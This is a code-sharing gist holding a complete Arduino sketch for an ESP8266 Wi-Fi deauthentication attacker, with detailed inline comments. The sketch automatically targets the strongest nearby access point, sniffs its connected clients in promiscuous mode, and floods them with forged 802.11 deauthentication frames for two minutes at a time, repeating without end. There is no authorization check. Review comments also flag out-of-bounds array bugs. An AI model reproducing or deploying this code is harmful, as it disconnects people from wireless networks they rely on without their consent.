@maesoser
Last active September 23, 2020 18:12
Small and simple esp8266 deauthenticator
#include "ESP8266WiFi.h"
extern "C" {
#include "user_interface.h"
}
// GPIO pulsed by blink() every BLINK_PERIOD_MS during the send loop in loop().
#define BOARD_LED 16
// GPIO pulsed by blinkSleep() while sniffing. The board variant selected in the
// Arduino build may already define LED_BUILTIN; if its value differs this
// redefinition wins and the compiler emits a redefinition warning.
#define LED_BUILTIN 2
// Number of blocking WiFi scans getTargetAP() performs before choosing a target.
#define MAX_SCANS 2
// Time (ms) an LED is held low in blink(); blinkSleep() adds 3x this as the high phase.
#define BLINK_TIME_MS 40
// Interval (ms) between BOARD_LED pulses in loop().
#define BLINK_PERIOD_MS 5000
// Duration (ms) of the promiscuous capture window passed to getClients().
#define CLIENT_SCAN_TIME_MS 20000
// Duration (ms) of the send loop in loop() before the pass ends.
#define ATTACK_TIME_MS 120000
// Capacity of the clients[] table; see the bound checks in packetSniffer()/getClientIndex().
#define MAX_CLIENTS 64
// Byte count handed to wifi_send_pkt_freedom() in sendDeauth(). DeauthFrame's
// natural layout is also 26 bytes, but nothing in the file asserts the two agree.
#define DEAUTH_PACKET_SIZE 26
// Length of a MAC address in bytes; used for every memcpy/memcmp on addresses.
#define MAC_ADDR_SIZE 6
// All-ones (broadcast) MAC. packetSniffer() skips frames whose dst equals it.
uint8_t bcast[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};
// Access point selected by getTargetAP(); a single global instance `ap` exists.
struct TargetAP{
uint8_t bssid[MAC_ADDR_SIZE] ; // copied from WiFi.BSSID(i) of the chosen scan entry
int chan ; // WiFi.channel(i); -1 is the "nothing selected yet" sentinel checked by loop()
int rssi ; // WiFi.RSSI(i) of the chosen entry; getTargetAP() starts from -100
String ssid ; // WiFi.SSID(i), used only for the Serial report
} ;
// One entry of the clients[] table filled by packetSniffer().
struct TargetClient{
uint8_t bssid[MAC_ADDR_SIZE] ; // the 6-byte "dst" field packetSniffer() read from the frame
uint32_t pkts ; // number of matching frames seen for this entry
} ;
// Byte layout of the buffer sendDeauth() passes to wifi_send_pkt_freedom().
// sendDeauth() assigns type, subtype, reason, dst, src and bssid; every other
// field stays zero from the `= {}` initialisation. With natural alignment the
// struct is 26 bytes, matching DEAUTH_PACKET_SIZE; a
// static_assert(sizeof(DeauthFrame) == DEAUTH_PACKET_SIZE, "...") would lock that in.
struct DeauthFrame{
uint8_t type;
uint8_t subtype;
uint16_t duration;
uint8_t dst[MAC_ADDR_SIZE];
uint8_t src[MAC_ADDR_SIZE];
uint8_t bssid[MAC_ADDR_SIZE];
uint8_t fragment;
uint8_t sec_num;
uint16_t reason;
} ;
// Target chosen by getTargetAP(); read by packetSniffer(), getClients() and loop().
TargetAP ap = {};
// Client table written by packetSniffer(). As a namespace-scope object it is
// zero-initialised, which is what lets packetSniffer() `++` pkts on a fresh slot.
TargetClient clients[MAX_CLIENTS];
// Number of entries of clients[] in use. Only ever incremented; nothing in this
// file resets it, so entries survive across passes of loop().
uint32_t n_clients = 0;
// millis() stamps used by loop(): start of the send window, and last BOARD_LED pulse.
uint32_t attack_timer;
uint32_t led_timer;
// getTargetAP tries to find the closest AP to select it as the target.
//
// Runs MAX_SCANS blocking scans (the second argument to scanNetworks asks for
// hidden networks to be included) and keeps, in the global `ap`, the entry
// with the highest RSSI seen across all of them. rssi starts at -100 and chan
// at -1, so a run in which no scan returns a network leaves ap.chan == -1;
// loop() uses that sentinel to retry. The result is reported on Serial.
// Note `%x` has no `02` width, so address bytes below 0x10 print as one digit.
void getTargetAP(){
ap.rssi = -100;
ap.chan = -1;
for (int j = 0; j < MAX_SCANS; j++){
Serial.printf("[%d / %d] Scan start ... ", j+1, MAX_SCANS);
int n = WiFi.scanNetworks(false, true);
Serial.printf("%d network(s) found\n", n);
for (int i = 0; i < n; i++){
// Strictly greater: on equal RSSI the earlier entry is kept.
if (WiFi.RSSI(i) > ap.rssi){
ap.ssid = WiFi.SSID(i);
// BSSID(i) points into the scan result; copy it out before the next scan replaces it.
uint8_t *mac = WiFi.BSSID(i);
memcpy(ap.bssid, mac, MAC_ADDR_SIZE);
ap.rssi = WiFi.RSSI(i);
ap.chan = WiFi.channel(i);
}
}
}
Serial.printf("Target is %s (%ddBm) %x:%x:%x:%x:%x:%x\n", ap.ssid.c_str(), ap.rssi, ap.bssid[0],ap.bssid[1],ap.bssid[2],ap.bssid[3],ap.bssid[4],ap.bssid[5]);
}
// Returns true when the two addresses are byte-for-byte identical over
// MAC_ADDR_SIZE bytes. Both pointers must reference at least that many bytes.
bool macCompare(uint8_t *a, uint8_t *b){
    return memcmp(a, b, MAC_ADDR_SIZE) == 0;
}
// Returns the index of the clients[] entry whose bssid equals `a`, or -1 if
// there is none.
// NOTE(review): the bound is `i <= n_clients`, so the loop also reads
// clients[n_clients], the slot one past the last recorded client. While
// n_clients < MAX_CLIENTS that is merely an unused zero-filled entry; once
// n_clients reaches MAX_CLIENTS it is past the end of the array. `i < n_clients`
// is the intended bound. `i` is int and n_clients is uint32_t, so the comparison
// mixes signed and unsigned.
int getClientIndex(uint8_t *a){
for (int i = 0; i <= n_clients; i++){
if (macCompare(clients[i].bssid, a)) return i;
}
return -1;
}
/*
* packetSniffer captures wifi frames, compares them with the targetAP and if it belongs to it, then it creates a new
* client struct and stores the number of packets and the MAC addr.
*
* Installed by getClients() through wifi_set_promiscuous_rx_cb, so it runs in
* the SDK's receive-callback context for every frame while promiscuous mode is
* enabled. Only buffers longer than 27 bytes are examined; the two 6-byte
* fields at offsets 16 and 22 are taken as "src" and "dst" (presumably address
* fields of the captured frame following the SDK's receive header -- confirm
* against the buffer format the SDK delivers). A frame is recorded when src
* equals ap.bssid and dst is not the broadcast address.
* NOTE(review): the clamp `n_clients > MAX_CLIENTS` still allows n_clients to
* equal MAX_CLIENTS, so once the table is full every new address is written to
* clients[MAX_CLIENTS], one past the end of the array; a `>=` check that
* returns instead of writing would keep the store in bounds.
*/
void packetSniffer(uint8_t *buf, uint16_t len) {
uint8_t src[6] ;
uint8_t dst[6] ;
if (len > 27) {
memcpy(src, &buf[16], MAC_ADDR_SIZE);
memcpy(dst, &buf[22], MAC_ADDR_SIZE);
if ( macCompare(src, ap.bssid) && !macCompare(dst, bcast)) {
int index = getClientIndex(dst);
if (index == -1){
// See NOTE(review) above: this clamp does not prevent the out-of-bounds write.
if (n_clients > MAX_CLIENTS) n_clients = MAX_CLIENTS;
memcpy(clients[n_clients].bssid, dst, MAC_ADDR_SIZE);
// Relies on clients[] being zero-initialised as a global.
clients[n_clients].pkts ++;
n_clients ++;
}else{
clients[index].pkts++;
}
}
}
}
// getClients listens on `chan` for `scanTime` ms and lets packetSniffer() fill
// clients[] with stations seen exchanging frames with ap.bssid.
//
// Side effects: drops any station association, forces STATION_MODE, changes
// the radio channel, and turns promiscuous mode on for the window and off
// again afterwards. n_clients is not reset here (nor anywhere else in this
// file), so entries from earlier calls persist. The `bssid` parameter is
// never read -- the filter in packetSniffer() uses the global `ap` directly.
// blinkSleep() is defined further down the file; this compiles only because
// the Arduino build generates prototypes for .ino sketches.
// Format note: `%d` is used for the uint32_t values n_clients and scanTime.
void getClients(uint8_t *bssid, int chan, uint32_t scanTime){
Serial.printf("Looking for connected clients on channel %d\n", chan);
wifi_promiscuous_enable(0);
WiFi.disconnect();
wifi_set_opmode(STATION_MODE);
wifi_set_channel(chan);
wifi_promiscuous_enable(1);
wifi_set_promiscuous_rx_cb(packetSniffer);
// Blocks for the capture window while pulsing LED_BUILTIN.
blinkSleep(scanTime);
wifi_promiscuous_enable(0);
Serial.printf("Found %d clients scan after %d ms\n", n_clients, scanTime);
// int i vs uint32_t n_clients: signed/unsigned comparison.
for (int i = 0; i < n_clients; i++) {
Serial.printf("%d: %d pkts from %x:%x:%x:%x:%x:%x\n", i, clients[i].pkts, clients[i].bssid[0], clients[i].bssid[1], clients[i].bssid[2], clients[i].bssid[3], clients[i].bssid[4], clients[i].bssid[5]);
}
}
// sendDeauth fills one DeauthFrame for the (src, dst) pair and hands it to the
// SDK's raw transmit call.
//
// Fields not assigned below stay zero because of the `= {}` initialisation;
// the bssid field is a copy of src. The byte count passed to
// wifi_send_pkt_freedom is the DEAUTH_PACKET_SIZE macro rather than
// sizeof(dpkt); they agree for the struct's natural layout, but nothing checks
// it -- a static_assert on sizeof(DeauthFrame) would. The last argument (0) is
// passed through to the SDK unchanged; its meaning is not documented in this
// file. The trailing delay(1) paces consecutive calls from loop().
void sendDeauth( uint8_t *src, uint8_t *dst){
DeauthFrame dpkt = {};
dpkt.type = 0xC0;
dpkt.subtype = 0x00;
dpkt.reason = 0x0100;
memcpy(dpkt.dst, dst, MAC_ADDR_SIZE);
memcpy(dpkt.src, src, MAC_ADDR_SIZE);
memcpy(dpkt.bssid, src, MAC_ADDR_SIZE);
wifi_send_pkt_freedom((uint8_t *)&dpkt, DEAUTH_PACKET_SIZE, 0);
delay(1);
}
// Drives `led` low for `t` ms, then back high. The pin is presumably
// active-low (setup() parks both LEDs high), so this is one visible pulse.
// Blocks the caller for the whole duration.
void blink(uint32_t t, int led){
    const bool lit = false;   // low level = LED on, by the active-low assumption above
    digitalWrite(led, lit);
    delay(t);
    digitalWrite(led, !lit);
}
// Blocks for at least `t` ms while pulsing LED_BUILTIN. Each cycle is
// BLINK_TIME_MS low followed by 3*BLINK_TIME_MS high; the elapsed-time check
// runs only after a full cycle, so at least one cycle always executes and the
// call may overrun `t` by up to one cycle. The unsigned difference tolerates
// millis() wrapping (millis() is a 32-bit unsigned value on the ESP8266 core).
void blinkSleep(uint32_t t){
    const uint32_t started = millis();
    for (;;) {
        blink(BLINK_TIME_MS, LED_BUILTIN);
        delay(3*BLINK_TIME_MS);
        const uint32_t elapsed = millis() - started;
        if (elapsed >= t) break;
    }
}
// Arduino entry point: configure both LED pins as outputs, park them high
// (presumably LED off -- blink() drives them low to pulse), then open Serial
// at 115200 baud for the status messages printed elsewhere in the sketch.
void setup(){
    const int leds[] = {BOARD_LED, LED_BUILTIN};
    // Both pins become outputs before either level is written, as before.
    for (int pin : leds) pinMode(pin, OUTPUT);
    for (int pin : leds) digitalWrite(pin, true);
    Serial.begin(115200);
}
// Arduino main loop. Each call performs one full pass:
//   1. call getTargetAP() until it has selected an AP (ap.chan != -1), then
//      getClients() on that channel for CLIENT_SCAN_TIME_MS; repeat the pair
//      while n_clients is still 0;
//   2. for ATTACK_TIME_MS, call sendDeauth(ap.bssid, clients[i].bssid) for
//      every recorded client, pulsing BOARD_LED every BLINK_PERIOD_MS.
// LED_BUILTIN is driven low at the top of the pass; blinkSleep() (via
// getClients()) later leaves it high. Because n_clients is never reset in this
// file, in later passes the outer do-while exits after a single getClients()
// call whether or not it found anyone, and clients recorded in earlier passes
// are kept -- possibly against a different AP if the scan picked another one.
// Timing uses unsigned millis() differences, so wraparound is handled.
void loop(){
digitalWrite(LED_BUILTIN, false);
do {
do {
getTargetAP();
delay(5);
} while (ap.chan ==-1);
getClients(ap.bssid, ap.chan, CLIENT_SCAN_TIME_MS);
} while (n_clients == 0);
Serial.printf("Attacking for %d ms\n", ATTACK_TIME_MS);
attack_timer = millis();
led_timer = millis();
while( (millis() - attack_timer) < ATTACK_TIME_MS ){
if ((millis() - led_timer) > BLINK_PERIOD_MS){
led_timer = millis();
blink(BLINK_TIME_MS, BOARD_LED);
}
// int i vs uint32_t n_clients: signed/unsigned comparison.
for (int i = 0; i < n_clients; i++) {
sendDeauth(ap.bssid, clients[i].bssid);
}
}
}